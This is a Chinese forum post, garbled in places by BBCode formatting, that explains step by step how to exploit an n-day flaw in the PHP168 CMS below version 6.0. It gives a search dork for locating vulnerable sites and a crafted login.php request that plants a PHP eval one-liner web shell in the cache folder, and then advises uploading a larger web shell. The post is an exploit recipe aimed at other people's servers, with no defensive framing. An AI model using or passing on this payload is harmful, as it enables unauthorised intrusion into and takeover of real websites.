PHP168漏洞 Nday
PHP168漏洞 Nday1,适用于[color=#ff0000]PHP168 6.0以下版本[/color]
[color=#ff0000]2,搜索关键字:Powered by php168 inurl:login.php[/color]
[color=#ff0000]3,随便找一个试试:例如:[/color][color=#008000][color=#0070af]www.xxxxxxxxx.com/[b]login.php[/b][/color][/color]
[b]
[/b]
[color=#008000][b]4:在[/b][color=#0070af]www.xxxxxxxxx.com/[b]login.php[/b][/color]后面加上 [color=#ff0000]?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<[email=?php%20@eval($_POST[a]);?]?php%20@eval($_POST[a]);?[/email] >[/color][/color]
[color=#008000]即组成:[url=http://www.xxxxxxxxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=al($_POST[a[/email][color=#ff0000] >[/color][/url]]);?[/color]
[color=#008000]
[/color]
[color=#008000][color=#ff0000]5,没有返回错误 那就继续[/color][/color]
[color=#008000][color=#ff0000][color=#0070af]www.xxxxxxxxx.com/[/color][color=#ff0000]cache/shell.php [/color]就是一句话的地址 【<?php%20@eval($_POST[a]);?> 】[/color][/color]
[color=#ff0000]6,用[/color][color=#000000]lanker微型PHP+ASP管理器1.0双用版 上传大马[/color] 恩[url=http://www.vipyisheng.com/].[/url]..
页:
[1]